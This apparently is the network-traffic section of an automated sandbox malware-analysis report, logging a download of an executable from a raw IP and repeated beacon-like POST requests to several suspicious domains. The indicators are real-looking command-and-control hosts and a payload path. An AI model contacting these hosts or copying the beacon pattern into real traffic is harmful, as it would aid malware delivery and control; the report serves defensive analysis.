                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewASN Name: RAYA-ASEG RAYA-ASEG
                Source: Joe Sandbox ViewASN Name: MegaCableSAdeCVMX MegaCableSAdeCVMX
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://qchnpedxxogxdjn.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 112
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://oqqsbiatqglrn.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 176
                    Host: bestworldhools.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://xoybtutnnxkecaqf.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 262
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://cqxtjrqcgsayay.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 251
                    Host: bestworldhools.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://nihavgqtcpkgtcxt.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 111
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://uheybmputpop.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 267
                    Host: bestworldhools.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://glhqomjbdpj.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 269
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://xnhhfayqvhtyngw.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 175
                    Host: bestworldhools.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://hptbtnqwmmhbw.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 264
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://klstdrudvxhgouey.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 278
                    Host: bestworldhools.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://dtojnsdaxdil.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 300
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://mwlktdttfgqo.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 270
                    Host: bestworldhools.com
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bmrvdxbbdeon.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 338
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://hkxxphsdfyiakovt.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 350
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://hgegifhrmen.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 174
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jqmiciumjrg.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 142
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://xlakrjktmvagfqhe.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 259
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://cvqgcpbdqadirwgw.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 169
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://rhtihevserv.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 178
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://xvhoixsulem.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 149
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://eywbfvbvilup.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 196
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://garnufhrqshsv.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 251
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://jpqykkhyhkjhpkd.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 186
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ctxuhanhwfs.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 326
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ncglteyuwoqfog.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 305
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://uknyifxswcdyll.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 123
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://pxdktwwwgewqlyba.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 247
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://emasrygonyft.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 356
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://pwvfxidmiqrrd.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 219
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://gcmljhlsnyknod.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 256
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://emsfvchaaieje.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 120
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://goboxcgfexx.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 175
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ruprlmkhoul.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 200
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://isbmdtufnkfjsgc.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 342
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://dkfsbqntnihxbnlu.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 223
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://aiwrtqoespykiwu.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 171
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://isyxarorgwntyxfd.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 186
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://busntnknves.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 347
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ewcutxkdkeyvacp.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 244
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://lwocwqbtqohnf.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 169
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://tiisncfdrpaiu.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 361
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://gieumfrwvwjruuah.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 114
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://hkihwrdtvsi.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 189
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://bqpiqprsuajpd.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 149
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://fsqorqnhaeehy.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 230
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://eihhylujhlro.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 360
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://qcgaudpuoiuttos.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 249
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://mhqikqiwjyotw.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 205
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://dymavinnaeuaxxm.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 346
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://xuqynkrewbaraj.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 238
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://niarphxxbktdxvwh.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 339
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://lqpnyjpucaq.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 132
                    Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://akokgrlutaukqvq.org/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 348
                    Host: nwgrus.ru
                Source: unknown | TCP traffic detected without corresponding DNS query: 23.145.40.164 (50 identical entries)
                Source: global traffic | HTTP traffic detected: GET /ksa9104.exe HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Host: 23.145.40.164
                Source: global traffic | DNS traffic detected: DNS query: nwgrus.ru
                Source: global traffic | DNS traffic detected: DNS query: calvinandhalls.com
                Source: global traffic | DNS traffic detected: DNS query: bestworldhools.com
                Source: unknown | HTTP traffic detected: POST /search.php HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: https://qchnpedxxogxdjn.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 112
                    Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:00:14 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:00:17 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:01:32 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:01:33 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:01:55 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:01:56 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:02:16 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:02:17 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:02:39 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:02:40 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:03:02 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.18.0
                    Content-Length: 0
                    Content-Type: application/octet-stream
                    Date: Mon, 07 Oct 2024 13:03:03 GMT
                    Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:24 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 04 00 00 00 72 e8 87 ee
                    Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:25 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:26 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:28 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
